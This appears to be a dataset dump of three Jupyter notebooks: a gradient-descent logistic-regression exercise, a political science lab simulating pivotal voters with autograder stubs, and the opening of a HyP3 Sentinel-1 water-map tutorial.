def train(features, targets, epochs, learnrate, graph_lines=False):
errors = []
n_records, n_features = features.shape
last_loss = None
weights = np.random.normal(scale=1 / n_features**.5, size=n_features)
bias = 0
for e in range(epochs):
del_w = np.zeros(weights.shape)
for x, y in zip(features, targets):
output = output_formula(x, weights, bias)
error = error_formula(y, output)
weights, bias = update_weights(x, y, weights, bias, learnrate)
# Printing out the log-loss error on the training set
out = output_formula(features, weights, bias)
loss = np.mean(error_formula(targets, out))
errors.append(loss)
if e % (epochs / 10) == 0:
print("\n========== Epoch", e,"==========")
if last_loss and last_loss < loss:
print("Train loss: ", loss, " WARNING - Loss Increasing")
else:
print("Train loss: ", loss)
last_loss = loss
predictions = out > 0.5
accuracy = np.mean(predictions == targets)
print("Accuracy: ", accuracy)
if graph_lines and e % (epochs / 100) == 0:
display(-weights[0]/weights[1], -bias/weights[1])
# Plotting the solution boundary
plt.title("Solution boundary")
display(-weights[0]/weights[1], -bias/weights[1], 'black')
# Plotting the data
plot_points(features, targets)
plt.show()
# Plotting the error
plt.title("Error Plot")
plt.xlabel('Number of epochs')
plt.ylabel('Error')
plt.plot(errors)
plt.show()
```
## Time to train the algorithm!
When we run the function, we'll obtain the following:
- 10 updates with the current training loss and accuracy
- A plot of the data and some of the boundary lines obtained. The final one is in black. Notice how the lines get closer and closer to the best fit, as we go through more epochs.
- A plot of the error function. Notice how it decreases as we go through more epochs.
```
train(X, y, epochs*10, learnrate, True)
```
|
github_jupyter
|
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
#Some helper functions for plotting and drawing lines
def plot_points(X, y):
admitted = X[np.argwhere(y==1)]
rejected = X[np.argwhere(y==0)]
plt.scatter([s[0][0] for s in rejected], [s[0][1] for s in rejected], s = 25, color = 'blue', edgecolor = 'k')
plt.scatter([s[0][0] for s in admitted], [s[0][1] for s in admitted], s = 25, color = 'red', edgecolor = 'k')
def display(m, b, color='g--'):
plt.xlim(-0.05,1.05)
plt.ylim(-0.05,1.05)
x = np.arange(-10, 10, 0.1)
plt.plot(x, m*x+b, color)
data = pd.read_csv('https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/intro-neural-networks/gradient-descent/data.csv', header=None)
X = np.array(data[[0,1]])
y = np.array(data[2])
plot_points(X,y)
plt.show()
# Implement the following functions
# Activation (sigmoid) function
def sigmoid(x):
sig_x = 1./(1.+np.exp(-x))
return sig_x
# Output (prediction) formula
def output_formula(features, weights, bias):
return sigmoid(np.dot(features, weights) + bias)
# Error (log-loss) formula
def error_formula(y, output):
E = -y*np.log(output) - (1-y)*np.log(1-output)
return E
# Gradient descent step
def update_weights(x, y, weights, bias, learnrate):
output = output_formula(x, weights, bias)
d_error = y - output
weights += learnrate * d_error * x
bias += learnrate * d_error
return weights, bias
np.random.seed(44)
epochs = 100
learnrate = 0.01
def train(features, targets, epochs, learnrate, graph_lines=False):
errors = []
n_records, n_features = features.shape
last_loss = None
weights = np.random.normal(scale=1 / n_features**.5, size=n_features)
bias = 0
for e in range(epochs):
del_w = np.zeros(weights.shape)
for x, y in zip(features, targets):
output = output_formula(x, weights, bias)
error = error_formula(y, output)
weights, bias = update_weights(x, y, weights, bias, learnrate)
# Printing out the log-loss error on the training set
out = output_formula(features, weights, bias)
loss = np.mean(error_formula(targets, out))
errors.append(loss)
if e % (epochs / 10) == 0:
print("\n========== Epoch", e,"==========")
if last_loss and last_loss < loss:
print("Train loss: ", loss, " WARNING - Loss Increasing")
else:
print("Train loss: ", loss)
last_loss = loss
predictions = out > 0.5
accuracy = np.mean(predictions == targets)
print("Accuracy: ", accuracy)
if graph_lines and e % (epochs / 100) == 0:
display(-weights[0]/weights[1], -bias/weights[1])
# Plotting the solution boundary
plt.title("Solution boundary")
display(-weights[0]/weights[1], -bias/weights[1], 'black')
# Plotting the data
plot_points(features, targets)
plt.show()
# Plotting the error
plt.title("Error Plot")
plt.xlabel('Number of epochs')
plt.ylabel('Error')
plt.plot(errors)
plt.show()
train(X, y, epochs*10, learnrate, True)
| 0.768299 | 0.983925 |
```
# Initialize Otter
import otter
grader = otter.Notebook("PS88_lab_week3.ipynb")
```
# PS 88 Week 3 Lab: Simulations and Pivotal Voters
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from datascience import Table
from ipywidgets import interact
%matplotlib inline
```
## Part 1: Plotting expected utility
We can use Python to do expected utility calculations and explore the relationship between parameters in decision models and optimal choices.
In class we showed that the expected utility for voting for a preferred candidate can be written $p_1 b - c$. A nice way to do calculations like this is to first assign values to the variables:
```
p1=.6
b=100
c=2
p1*b-c
```
**Question 1.1. Write code to compute the expected utility to voting when $p_1 = .5$, $b=50$, and $c=.5$ **
```
#Answer to 1.1 here
p1=.5
b=50
c=.5
p1*b-c
```
We don't necessarily care about these expected utilities on their own, but how they compare to the expected utility to abstaining.
**Question 1.2. If $b=50$ and $p_0 = .48$, write code to compute the expected utility to abstaining.**
```
# Code for 1.2 here
p0=.48
b=50
p0*b
```
**Question 1.3. Given 1.1 and 1.2, is voting the expected utility maximizing choice given given these parameters?**
Answer to 1.3 here
We can also use the graphic capabilities of Python to learn more about how these models work.
```
plt.hlines(p0*b, 0,1, label='Abstaining Utility')
import matplotlib.pyplot as plt
import numpy as np
from ipywidgets import interact, IntSlider, FloatSlider
def plotEU(b):
plt.hlines(p0*b, 0,2, label='Abstaining Utility')
c = np.arange(0,2, step=.01)
y = p1*b-c
plt.ticklabel_format(style='plain')
plt.xticks(rotation=45)
plt.plot(c,y, label='Voting Expected Utility')
# plt.vlines(no_lobbying+1e7-1e5*p, -2e7, 0, linestyles="dashed")
plt.xlabel('Voting Cost')
plt.ylabel('Expected Utility')
plt.legend()
interact(plotEU, b=IntSlider(min=0,max=300, value=100))
```
## Part 2: Simulating votes
How can we estimate the probability of a vote mattering? One route is to use probability theory, which in realistic settings (like the electoral college in the US) requires lots of complicated mathematical manipulation. Another way, which will often be faster and uses the tools you are learning in Data 8, is to run simulations.
As we will see throughout the class, simulation is an incredibly powerful tool that can be used for many purposes. For example, later in the class we will use simulation to see how different causal processes can produce similar data.
For now, we are going to use simulation to simulate the probability a vote matters. The general idea is simple. We will create a large number of "fake electorates" with parameters and randomness that we control, and then see how often an individual vote matters in these simulations.
Before we get to voting, let's do a simple exercise as warmup. Suppose we want to simulate flipping a coin 10 times. To do this we can use the `random.binomial` function from `numpy` (imported above as `np`). This function takes two arguments: the number of flips (`n`) and the probability that a flip is "heads" (`p`). More generally, we often call $n$ the number of "trials" and $p$ the probability of "success".
The following line of code simulates flipping a "fair" (i.e., $p=.5$) coin 10 times. Run it a few times.
```
# First number argument is the number of times to flip, the second is the probability of a "heads"
np.random.binomial(n=10, p=.5)
```
We can simulate 100 coin flips at a time by changing the `n` argument to 100:
```
np.random.binomial(n=100, p=.5)
```
In the 2020 election, about 158.4 million people voted. This is a big number to have to keep typing, so let's define a variable:
```
voters2020 = 158400000
```
**Question 2a. Write a line of code to simulate 158.4 million people flipping a coin and counting how many heads there are.**
<!--
BEGIN QUESTION
name: q2a
-->
```
# Code for 2a here
sim = ...
sim
grader.check("q2a")
```
Of course, we don't care about coin flipping per se, but we can think about this as the number of "yes" votes if we have n people who vote for a candidate with probability $p$. In the 2020 election, about 51.3% of the voters voted fro Joe Biden. Let's do a simulated version of the election: by running `np.random.binomial` with 160 million trials and a probability of "success" of 51.3%.
**Question 2b. Write code for this trial**
<!--
BEGIN QUESTION
name: q2b
-->
```
# Code for 2b
joe_count = ...
joe_count
grader.check("q2b")
```
<!-- BEGIN QUESTION -->
In reality, Biden won 81.3 million votes.
**Question 2c. How close was your answer to the real election? Compare this to the cases where you flipped 10 coins at a time.**
<!--
BEGIN QUESTION
name: q2c
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
## Part 3. Pivotal votes.
Suppose that you are a voter in a population with 10 people who are equally likely to vote for candidate A or candidate B, and you prefer candidate A. If you turn out to vote, you will be pivotal if the other 10 are split evenly between the two candidates. How often will this happen?
We can answer this question by running a whole bunch of simulations where we effectively flip 10 coins and count how many heads there are.
The following line runs the code to do 10 coin flips with `p=5` 10,000 times, and stores the results in an array.(Don't worry about the details here: we will cover how to write "loops" like this later.)
```
ntrials=10000
trials10 = [np.random.binomial(n=10, p=.5) for _ in range(ntrials)]
```
Here is the ouput:
```
trials10
```
Let's put these in a table, and then make a histogram to see how often each trial number happens. To make sure we just get a count of how many are at each interval, we need to get the "bins" right.
```
list(range(11))
simtable = Table().with_column("sims10",trials10)
simtable.hist("sims10", bins=range(11))
```
Let's see what happens with 20 coin flips. First we create a bunch of simulations:
```
trials20 = [np.random.binomial(n=20, p=.5) for _ in range(ntrials)]
```
And then add the new trials to `simtable` using the `.with_column()` function.
```
simtable=simtable.with_column("sims20", trials20)
simtable
```
<!-- BEGIN QUESTION -->
**Question 3.1 Make a histogram of the number of heads in the trials with 20 flips. Make sure to set the bins so there each one contains exactly one integer.**
<!--
BEGIN QUESTION
name: q3a
manual: true
-->
```
...
```
<!-- END QUESTION -->
Let's see what this looks like with a different probability of success. Here is a set of 10 trials with a higher probaility of success ($p = .7$)
```
trials_high = [np.random.binomial(n=10, p=.7) for _ in range(ntrials)]
```
<!-- BEGIN QUESTION -->
**Question 3.2. Add this array to `simtable`, as a variable called `sims_high`, and create a histogram which shows the frequency of heads in these trials**
<!--
BEGIN QUESTION
name: q3b
manual: true
-->
```
simtable= ...
...
```
<!-- END QUESTION -->
```
simtable
```
<!-- BEGIN QUESTION -->
**Question 3.3. Compare this to the graph where $p=.5$**
<!--
BEGIN QUESTION
name: q3c
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
Next we want to figure out exactly how often a voter is pivotal in different situations. To do this, let's create a variable called `pivot10` which is true when there are exactly 5 other voters choosing each candidate.
```
simtable = simtable.with_column("pivot10", simtable.column("sims10")==5)
simtable
```
We can then count the number of trials where a voter was pivotal.
```
sum(simtable.column("pivot10"))
```
Since there were 10,000 trials, we can convert this into a percentage:
```
sum(simtable.column("pivot10"))/ntrials
```
**Question 3.4. Write code to determine what proportion of the time a voter is pivotal when $n=20$**
<!--
BEGIN QUESTION
name: q3d
-->
```
simtable= ...
pivotal_freq = ...
pivotal_freq
grader.check("q3d")
```
To explore how chaning the size of the electorate and the probabilities of voting affect the probability of being pivotal without having to go through all of these steps, we will define a function which does one simulation and then checks whether a new voter would be pivotal.
```
def one_pivot(n,p):
return 1*(np.random.binomial(n=n,p=p)==n/2)
```
Run this a few times.
```
one_pivot(n=10, p=.6)
```
Let's see how the probability of being pivotal changes with a higher n. To do so, we will use the same looping trick to store 10,000 simulations in an array called piv_trials100. (Note we defined `ntrials=10,000` above)
```
def pivotal_prob(p):
return sum(one_pivot(n=100, p=.5) for _ in range(ntrials))/ntrials
interact(pivotal_prob, p=(0,1, .1))
```
Or a lower p
```
piv_trials100 = [one_pivot(n=100, p=.4) for _ in range(ntrials)]
sum(piv_trials100)/ntrials
```
**Question 3.5 Write a line of code to simulate how often a voter will be pivotal in an electorate with 50 voters and $p=.55$**
<!--
BEGIN QUESTION
name: q3e
-->
```
piv_trials35 = ...
pivotal_freq = ...
pivotal_freq
grader.check("q3e")
```
<!-- BEGIN QUESTION -->
**Question 3.6 (Optional) Try running the one_pivot function with an odd number of voters. What happens and why?**
<!--
BEGIN QUESTION
name: q
manual: true
-->
```
...
```
<!-- END QUESTION -->
## Part 4. Pivotal votes with groups
To learn about situations like the electoral college, let's do a simluation with groups. Imagine there are three groups, who all make a choice by majority vote. The winning candidate is the one who wins a majority vote of the majority of groups, in this case at least two groups.
Questions like this become interesting when the groups vary, maybe in size or in predisposition towards certain candidates. To get started, we will look at an example where all the groups have 50 voters. Group 1 leans against candidate A, group B is split, and group C leans towards group A.
We start by making a table with the number of votes for candidate A in each group. All groups have 50 members, but they have different probabilities of voting for A.
```
#Group sizes
n1=50
n2=50
n3=50
# Probability of voting for A, by group
p1=.4
p2=.5
p3=.6
np.random.seed(88)
# Creating arrays for simulations for each group
group1 = [np.random.binomial(n=n1, p=p1) for _ in range(ntrials)]
group2 = [np.random.binomial(n=n2, p=p2) for _ in range(ntrials)]
group3 = [np.random.binomial(n=n3, p=p3) for _ in range(ntrials)]
#Putting the arrays into a table
grouptrials = Table().with_columns("votes1",group1,
"votes2", group2,
"votes3",group3)
grouptrials
```
Next we create a variable to check whether an individual voter would be pivotal if placed in each group.
```
grouptrials = grouptrials.with_columns("voter piv1", 1*(grouptrials.column("votes1")==n1/2),
"voter piv2", 1*(grouptrials.column("votes2")==n2/2),
"voter piv3", 1*(grouptrials.column("votes3")==n3/2))
grouptrials
```
Let's check how often voters in group 1 are pivotal
```
sum(grouptrials.column("voter piv1"))/ntrials
```
**Question 4a. Check how often voters in groups 2 and 3 are pivotal.**
<!--
BEGIN QUESTION
name: q4a
-->
```
group2pivotal = ...
group3pivotal = ...
group2pivotal, group3pivotal
grader.check("q4a")
```
<!-- BEGIN QUESTION -->
**Question: you should get that two of the groups have a similar probability of being pivotal, but one is different. Which is different any why?**
<!--
BEGIN QUESTION
name: q4b
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
Now let's check if each group is pivotal, i.e., if the group changing their vote changes which candidate wins the majority of groups. [Note: tricky stuff about ties here is important]
```
group1piv = 1*((grouptrials.column("votes2") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes2") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group2piv = 1*((grouptrials.column("votes1") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes1") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group3piv = 1*((grouptrials.column("votes1") <= n2/2)*(grouptrials.column("votes2") >= n3/2)+
(grouptrials.column("votes1") >= n2/2)*(grouptrials.column("votes2") <= n3/2))
grouptrials = grouptrials.with_columns("group piv1", group1piv,
"group piv2", group2piv,
"group piv3", group3piv)
grouptrials
```
**How often is each group pivotal?**
<!--
BEGIN QUESTION
name: q4c
-->
```
group1_pivotal_rate = ...
group2_pivotal_rate = ...
group3_pivotal_rate = ...
group1_pivotal_rate, group2_pivotal_rate, group3_pivotal_rate
grader.check("q4c")
```
<!-- BEGIN QUESTION -->
<!--
BEGIN QUESTION
name: q4d
manual: true
-->
**Two groups should have similar probabilities, with one group fairly different. Why is the case?**
_Type your answer here, replacing this text._
<!-- END QUESTION -->
A voter will be pivotal "overall" if they are pivotal within the group and the group is pivotal in the election. We can compute this by multiplying whether a voter is pivotal by whether their group is pivotal: the only voters who will be pivotal (represented by a 1) will have a 1 in both columns.
```
grouptrials = grouptrials.with_columns("overall piv 1",
grouptrials.column("voter piv1")*grouptrials.column("group piv1"),
"overall piv 2",
grouptrials.column("voter piv2")*grouptrials.column("group piv2"),
"overall piv 3",
grouptrials.column("voter piv3")*grouptrials.column("group piv3"))
grouptrials
```
**What is the probability of a voter in each group being pivotal?**
<!--
BEGIN QUESTION
name: q4e
-->
```
voter_1_pivotal_prob = sum(grouptrials.column("overall piv 1"))/ntrials
voter_2_pivotal_prob = ...
voter_3_pivotal_prob = ...
voter_1_pivotal_prob, voter_2_pivotal_prob, voter_3_pivotal_prob
grader.check("q4e")
```
We can graph the frequency with which a voter in a group is pivotal using `.hist("COLUMNNAME")`. Below, we graph the frequency of a voter in group one being pivotal. You can try graphing the frequency for voters in other groups by changing the column name below.
```
grouptrials.hist("overall piv 1")
```
How frequently do we see the combination of different voter and group pivotal status? In the cells below, we calculate both the absolute frequency as well as percentage of times in which a voter is or is not pivotal within their group as well as their group is or is not. For example, for the cell in which `col_0` and `row_0` equal 0, neither the voter nor the group was pivotal.
```
pd.crosstab(grouptrials.column("voter piv1"), grouptrials.column("group piv1"))
```
This cell mimics the above, except that by normalizing, we see the frequencies as a percentage overall.
```
pd.crosstab(grouptrials.column("voter piv1"), grouptrials.column("group piv1"), normalize=True)
```
Here is a function that ties it all together. It creates a table with group population parameter sizes as well as parameters for the probability of each kind of voter voting for candidate A.
```
def maketable(n1=50, n2=50, n3=50, p1=.4, p2=.5, p3=.6, ntrials=10000):
group1 = [np.random.binomial(n=n1, p=p1) for _ in range(ntrials)]
group2 = [np.random.binomial(n=n2, p=p2) for _ in range(ntrials)]
group3 = [np.random.binomial(n=n3, p=p3) for _ in range(ntrials)]
grouptrials = Table().with_columns("votes1",group1,
"votes2", group2,
"votes3",group3)
grouptrials = grouptrials.with_columns("voter piv1", 1*(grouptrials.column("votes1")==n1/2),
"voter piv2", 1*(grouptrials.column("votes2")==n2/2),
"voter piv3", 1*(grouptrials.column("votes3")==n3/2))
group1piv = 1*((grouptrials.column("votes2") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes2") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group2piv = 1*((grouptrials.column("votes1") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes1") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group3piv = 1*((grouptrials.column("votes1") <= n2/2)*(grouptrials.column("votes2") >= n3/2)+
(grouptrials.column("votes1") >= n2/2)*(grouptrials.column("votes2") <= n3/2))
grouptrials = grouptrials.with_columns("group piv1", group1piv,
"group piv2", group2piv,
"group piv3", group3piv)
grouptrials = grouptrials.with_columns("overall piv1",
grouptrials.column("voter piv1")*grouptrials.column("group piv1"),
"overall piv2",
grouptrials.column("voter piv2")*grouptrials.column("group piv2"),
"overall piv3",
grouptrials.column("voter piv3")*grouptrials.column("group piv3"))
return grouptrials
test = maketable()
test
```
What happens as we change the number of voters in each group relative to one another? In the following cell, use the sliders to change the number of voters in each group.
```
def voter_piv_rate(n1, n2, n3):
sims = maketable(n1, n2, n3)
for i in range(1,4):
print("Voter and Group are Both Pivotal Frequency", sum(sims.column(f"overall piv{i}"))/ntrials)
sims.hist(f"overall piv{i}")
plt.show()
interact(voter_piv_rate, n1=IntSlider(min=0,max=300, value=100), n2=IntSlider(min=0,max=300, value=100), n3=IntSlider(min=0,max=300, value=100))
```
<!-- BEGIN QUESTION -->
What happens as you change the sliders? Can you make the frequencies the same? How?
<!--
BEGIN QUESTION
name: q4f
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
If we keep the voter populations static, but change their probability of voting for candidate A, what happens?
```
def voter_piv_rate(p1, p2, p3):
sims = maketable(p1=p1, p2=p2, p3=p3)
for i in range(1,4):
print("Voter and Group are Both Pivotal Frequency", sum(sims.column(f"overall piv{i}"))/ntrials)
sims.hist(f"overall piv{i}")
plt.show()
return sims
interact(voter_piv_rate, p1=FloatSlider(min=0,max=1, value=.4, step=.1), p2=FloatSlider(min=0,max=1, value=.5, step=.1), p3=FloatSlider(min=0,max=1, value=.6, step=.1))
```
<!-- BEGIN QUESTION -->
What happens as you change the sliders? Can you make the frequencies the same? How?
<!--
BEGIN QUESTION
name: q4g
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
---
To double-check your work, the cell below will rerun all of the autograder tests.
```
grader.check_all()
```
## Submission
Make sure you have run all cells in your notebook in order before running the cell below, so that all images/graphs appear in the output. The cell below will generate a zip file for you to submit. **Please save before exporting!**
These are some submission instructions.
```
# Save your notebook first, then run this cell to export your submission.
grader.export()
```
|
github_jupyter
|
# Initialize Otter
import otter
grader = otter.Notebook("PS88_lab_week3.ipynb")
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from datascience import Table
from ipywidgets import interact
%matplotlib inline
p1=.6
b=100
c=2
p1*b-c
#Answer to 1.1 here
p1=.5
b=50
c=.5
p1*b-c
# Code for 1.2 here
p0=.48
b=50
p0*b
plt.hlines(p0*b, 0,1, label='Abstaining Utility')
import matplotlib.pyplot as plt
import numpy as np
from ipywidgets import interact, IntSlider, FloatSlider
def plotEU(b):
plt.hlines(p0*b, 0,2, label='Abstaining Utility')
c = np.arange(0,2, step=.01)
y = p1*b-c
plt.ticklabel_format(style='plain')
plt.xticks(rotation=45)
plt.plot(c,y, label='Voting Expected Utility')
# plt.vlines(no_lobbying+1e7-1e5*p, -2e7, 0, linestyles="dashed")
plt.xlabel('Voting Cost')
plt.ylabel('Expected Utility')
plt.legend()
interact(plotEU, b=IntSlider(min=0,max=300, value=100))
# First number argument is the number of times to flip, the second is the probability of a "heads"
np.random.binomial(n=10, p=.5)
np.random.binomial(n=100, p=.5)
voters2020 = 158400000
# Code for 2a here
sim = ...
sim
grader.check("q2a")
# Code for 2b
joe_count = ...
joe_count
grader.check("q2b")
ntrials=10000
trials10 = [np.random.binomial(n=10, p=.5) for _ in range(ntrials)]
trials10
list(range(11))
simtable = Table().with_column("sims10",trials10)
simtable.hist("sims10", bins=range(11))
trials20 = [np.random.binomial(n=20, p=.5) for _ in range(ntrials)]
simtable=simtable.with_column("sims20", trials20)
simtable
...
trials_high = [np.random.binomial(n=10, p=.7) for _ in range(ntrials)]
simtable= ...
...
simtable
simtable = simtable.with_column("pivot10", simtable.column("sims10")==5)
simtable
sum(simtable.column("pivot10"))
sum(simtable.column("pivot10"))/ntrials
simtable= ...
pivotal_freq = ...
pivotal_freq
grader.check("q3d")
def one_pivot(n,p):
return 1*(np.random.binomial(n=n,p=p)==n/2)
one_pivot(n=10, p=.6)
def pivotal_prob(p):
return sum(one_pivot(n=100, p=.5) for _ in range(ntrials))/ntrials
interact(pivotal_prob, p=(0,1, .1))
piv_trials100 = [one_pivot(n=100, p=.4) for _ in range(ntrials)]
sum(piv_trials100)/ntrials
piv_trials35 = ...
pivotal_freq = ...
pivotal_freq
grader.check("q3e")
...
#Group sizes
n1=50
n2=50
n3=50
# Probability of voting for A, by group
p1=.4
p2=.5
p3=.6
np.random.seed(88)
# Creating arrays for simulations for each group
group1 = [np.random.binomial(n=n1, p=p1) for _ in range(ntrials)]
group2 = [np.random.binomial(n=n2, p=p2) for _ in range(ntrials)]
group3 = [np.random.binomial(n=n3, p=p3) for _ in range(ntrials)]
#Putting the arrays into a table
grouptrials = Table().with_columns("votes1",group1,
"votes2", group2,
"votes3",group3)
grouptrials
grouptrials = grouptrials.with_columns("voter piv1", 1*(grouptrials.column("votes1")==n1/2),
"voter piv2", 1*(grouptrials.column("votes2")==n2/2),
"voter piv3", 1*(grouptrials.column("votes3")==n3/2))
grouptrials
sum(grouptrials.column("voter piv1"))/ntrials
group2pivotal = ...
group3pivotal = ...
group2pivotal, group3pivotal
grader.check("q4a")
group1piv = 1*((grouptrials.column("votes2") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes2") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group2piv = 1*((grouptrials.column("votes1") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes1") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group3piv = 1*((grouptrials.column("votes1") <= n2/2)*(grouptrials.column("votes2") >= n3/2)+
(grouptrials.column("votes1") >= n2/2)*(grouptrials.column("votes2") <= n3/2))
grouptrials = grouptrials.with_columns("group piv1", group1piv,
"group piv2", group2piv,
"group piv3", group3piv)
grouptrials
group1_pivotal_rate = ...
group2_pivotal_rate = ...
group3_pivotal_rate = ...
group1_pivotal_rate, group2_pivotal_rate, group3_pivotal_rate
grader.check("q4c")
grouptrials = grouptrials.with_columns("overall piv 1",
grouptrials.column("voter piv1")*grouptrials.column("group piv1"),
"overall piv 2",
grouptrials.column("voter piv2")*grouptrials.column("group piv2"),
"overall piv 3",
grouptrials.column("voter piv3")*grouptrials.column("group piv3"))
grouptrials
voter_1_pivotal_prob = sum(grouptrials.column("overall piv 1"))/ntrials
voter_2_pivotal_prob = ...
voter_3_pivotal_prob = ...
voter_1_pivotal_prob, voter_2_pivotal_prob, voter_3_pivotal_prob
grader.check("q4e")
grouptrials.hist("overall piv 1")
pd.crosstab(grouptrials.column("voter piv1"), grouptrials.column("group piv1"))
pd.crosstab(grouptrials.column("voter piv1"), grouptrials.column("group piv1"), normalize=True)
def maketable(n1=50, n2=50, n3=50, p1=.4, p2=.5, p3=.6, ntrials=10000):
group1 = [np.random.binomial(n=n1, p=p1) for _ in range(ntrials)]
group2 = [np.random.binomial(n=n2, p=p2) for _ in range(ntrials)]
group3 = [np.random.binomial(n=n3, p=p3) for _ in range(ntrials)]
grouptrials = Table().with_columns("votes1",group1,
"votes2", group2,
"votes3",group3)
grouptrials = grouptrials.with_columns("voter piv1", 1*(grouptrials.column("votes1")==n1/2),
"voter piv2", 1*(grouptrials.column("votes2")==n2/2),
"voter piv3", 1*(grouptrials.column("votes3")==n3/2))
group1piv = 1*((grouptrials.column("votes2") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes2") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group2piv = 1*((grouptrials.column("votes1") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes1") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
group3piv = 1*((grouptrials.column("votes1") <= n2/2)*(grouptrials.column("votes2") >= n3/2)+
(grouptrials.column("votes1") >= n2/2)*(grouptrials.column("votes2") <= n3/2))
grouptrials = grouptrials.with_columns("group piv1", group1piv,
"group piv2", group2piv,
"group piv3", group3piv)
grouptrials = grouptrials.with_columns("overall piv1",
grouptrials.column("voter piv1")*grouptrials.column("group piv1"),
"overall piv2",
grouptrials.column("voter piv2")*grouptrials.column("group piv2"),
"overall piv3",
grouptrials.column("voter piv3")*grouptrials.column("group piv3"))
return grouptrials
test = maketable()
test
def voter_piv_rate(n1, n2, n3):
sims = maketable(n1, n2, n3)
for i in range(1,4):
print("Voter and Group are Both Pivotal Frequency", sum(sims.column(f"overall piv{i}"))/ntrials)
sims.hist(f"overall piv{i}")
plt.show()
interact(voter_piv_rate, n1=IntSlider(min=0,max=300, value=100), n2=IntSlider(min=0,max=300, value=100), n3=IntSlider(min=0,max=300, value=100))
def voter_piv_rate(p1, p2, p3):
sims = maketable(p1=p1, p2=p2, p3=p3)
for i in range(1,4):
print("Voter and Group are Both Pivotal Frequency", sum(sims.column(f"overall piv{i}"))/ntrials)
sims.hist(f"overall piv{i}")
plt.show()
return sims
interact(voter_piv_rate, p1=FloatSlider(min=0,max=1, value=.4, step=.1), p2=FloatSlider(min=0,max=1, value=.5, step=.1), p3=FloatSlider(min=0,max=1, value=.6, step=.1))
grader.check_all()
# Save your notebook first, then run this cell to export your submission.
grader.export()
| 0.450601 | 0.963161 |
# On Demand water maps via HyP3-watermap
This notebook will leverage either [ASF Search -- Vertex](https://search.asf.alaska.edu/#/) or the
[asf_search](https://github.com/asfadmin/Discovery-asf_search) Python package, and the
[HyP3 SDK](https://hyp3-docs.asf.alaska.edu/using/sdk/), to request On Demand surface water extent maps
from the custom [hyp3-watermap](https://hyp3-watermap.asf.alaska.edu) HyP3 deployment.
Water maps are generated from Sentinel-1 SLCs or GRDs by:
1. Applying Radiometric Terrain Correction (RTC)
2. Creating initial VV- and VH-based water maps using a thresholding approach
3. Refining the initial VV- and VH-based water maps using fuzzy logic
4. Combining the refined VV- and VH-based water maps into a final water map
For more information on the methods, or to modify the water map methods and process them locally, see the
[water-extent-map.ipynb](water-extent-map.ipynb) notebook.
## 0. Initial setup
Import and setup some helper functions for this notebook.
```
import ipywidgets as widgets
from IPython.display import display
def wkt_input():
wkt = widgets.Textarea(
placeholder='WKT of search area',
value='POLYGON((-91.185 36.6763,-86.825 36.6763,-86.825 38.9176,-91.185 38.9176,-91.185 36.6763))',
layout=widgets.Layout(width='100%'),
)
display(wkt)
return wkt
def file_ids_input():
file_ids = widgets.Textarea(
placeholder='copy-paste Sentinel-1 granule names or file ids here (One granule or id per line)',
layout=widgets.Layout(width='100%', height='12em'),
)
display(file_ids)
return file_ids
```
## 1. Search for Sentinel-1 scenes to process
You can search for Sentinel-1 scenes with either [ASF Search -- Vertex](https://search.asf.alaska.edu/#/) or the
[asf_search](https://github.com/asfadmin/Discovery-asf_search) Python package. Vertex provides an interactive,
feature rich experience, while `asf_search` allows searching programmatically and mirrors the vertex interface
as best it can. Section 1.1 describes using Vertex and Section 1.2 describes using `asf_search`.
*Note: only 1.1 or 1.2 needs to be executed to run this notebook.*
### 1.1 Search for Sentinel-1 scenes in Vertex
Requesting water map products from the custom HyP3-watermap deployment looks very similar to
[requesting On Demand RTC products](https://storymaps.arcgis.com/stories/2ead3222d2294d1fae1d11d3f98d7c35),
**except** instead of adding scenes to your On Demand queue, you'll:
1. add the scenes to your Downloads cart

2. open the Downloads Cart and select "Copy File Ids", and

3. paste the file ids into the text area that will appear below the next cell.
**Note:** Water maps currently require the Sentinel-1 source granules to be SLCs (preferred) or High-Res GRDs,
acquired using the IW beam mode, with both VV and VH polarizations. You can use the
[example search](https://search.asf.alaska.edu/#/?beamModes=IW&polarizations=VV%2BVH&productTypes=SLC&zoom=6.190¢er=-91.993,33.963&polygon=POLYGON((-91.185%2036.6763,-86.825%2036.6763,-86.825%2038.9176,-91.185%2038.9176,-91.185%2036.6763))&start=2021-05-30T00:00:00Z&resultsLoaded=true&granule=S1A_IW_GRDH_1SDV_20210607T234810_20210607T234835_038241_04834F_4BB6-GRD_HD&end=2021-06-07T23:59:59Z)
or jump-start your search in Vertex (with the required parameters already set) by following [this link](https://search.asf.alaska.edu/#/?dataset=Sentinel-1&productTypes=SLC&beamModes=IW&polarizations=VV%2BVH).
```
file_ids = file_ids_input()
all_granules = [f.strip().split('-')[0] for f in file_ids.value.splitlines()]
display(sorted(all_granules))
```
### 1.2 Search for Sentinel-1 scenes with `asf_search`
We'll use the geographic search functionality of `asf_search` to perform a search over an Area of
Interest (AOI) represented as [Well-Known Text (WKT)](https://en.wikipedia.org/wiki/Well-known_text_representation_of_geometry).
